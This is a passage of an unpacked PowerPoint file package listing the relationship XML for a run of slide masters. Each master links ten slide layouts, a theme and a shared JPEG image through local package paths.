Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2711.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster273.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2729.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2728.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2727.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2726.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2725.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2724.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2723.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2722.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme273.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2730.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2721.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster274.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2739.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2738.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2737.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2736.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2735.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2734.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2733.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2732.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme274.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2740.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2731.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster275.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2749.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2748.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2747.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2746.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2745.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2744.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2743.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2742.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme275.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2750.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2741.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster276.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2759.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2758.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2757.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2756.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2755.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2754.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2753.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2752.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme276.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2760.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2751.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster277.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2769.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2768.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2767.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2766.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2765.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2764.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2763.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2762.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme277.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2770.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2761.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster278.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2779.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2778.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2777.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2776.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2775.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2774.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2773.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2772.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme278.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2780.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2771.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster279.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2789.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2788.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2787.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2786.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2785.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2784.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2783.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2782.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme279.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2790.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2781.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster28.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout279.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout278.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout277.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout276.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout275.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout274.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout273.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout272.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme28.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout280.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout271.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster280.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2799.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2798.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2797.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2796.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2795.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2794.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2793.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2792.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme280.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2800.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2791.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster281.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2809.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2808.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2807.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2806.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2805.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2804.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2803.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2802.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme281.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2810.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2801.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster282.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2819.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2818.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2817.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2816.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2815.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2814.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2813.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2812.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme282.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2820.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2811.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster283.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2829.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2828.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2827.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2826.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2825.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2824.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2823.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2822.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme283.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2830.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2821.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster284.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2839.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2838.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2837.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2836.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2835.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2834.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2833.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2832.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme284.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2840.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2831.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster285.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2849.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2848.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2847.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2846.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2845.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2844.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2843.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2842.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme285.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2850.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2841.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster286.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2859.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2858.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2857.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2856.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2855.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2854.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2853.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2852.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme286.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2860.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2851.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster29.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout289.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout288.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout287.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout286.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout285.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout284.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout283.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout282.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme29.xml"/><Relationship Id="rId11" 